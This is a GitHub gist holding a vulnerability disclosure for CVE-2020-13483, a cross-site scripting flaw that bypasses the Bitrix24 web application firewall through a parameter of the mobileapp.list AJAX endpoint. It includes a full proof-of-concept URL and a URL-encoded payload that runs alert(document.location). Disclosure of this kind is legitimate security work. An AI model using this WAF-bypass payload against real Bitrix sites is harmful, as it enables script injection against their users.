Skip to content

Instantly share code, notes, and snippets.

@mariuszpoplawski
Last active June 29, 2020 11:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mariuszpoplawski/44c5dd8ca1c40ebbacd119505254195e to your computer and use it in GitHub Desktop.
Save mariuszpoplawski/44c5dd8ca1c40ebbacd119505254195e to your computer and use it in GitHub Desktop.
CVE-2020-13483
------------------------------------------
The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
------------------------------------------
[Additional Information]
Vulnerability exists in:
http://192.168.1.30/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.location)%3B%7D%3B//%3C/div%3E
PAYLOAD:
%3Cimg+src=%22//%0d%0a);//%22%22%3E%3Cdiv%3Ex%0d%0a});var+BX+=+window.BX;window.BX+=+function(node,+bCache){};BX.ready+=+function(handler){};function+__MobileAppList(test){alert(document.location);};//%3C/div%3E
------------------------------------------
[VulnerabilityType Other]
Cross Site Scripting (XSS) - Bitrix WAF Bypass
------------------------------------------
[Vendor of Product]
Bitrix
------------------------------------------
[Affected Product Code Base]
Bitrix - up to security update (main 20.0.0), reported and fixed in latest patch
------------------------------------------
[Affected Component]
mobileapp.list
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Javascript / HTML injection
------------------------------------------
[Attack Vectors]
To exploit the vulnerability attacker must only have access to the website. There are no additional requirements.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Mariusz Popławski (afine.pl)
------------------------------------------
[Reference]
https://www.bitrix24.com/prices/self-hosted.php
https://www.bitrix24.com/security/
Mariusz Popławski / AFINE.com team
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment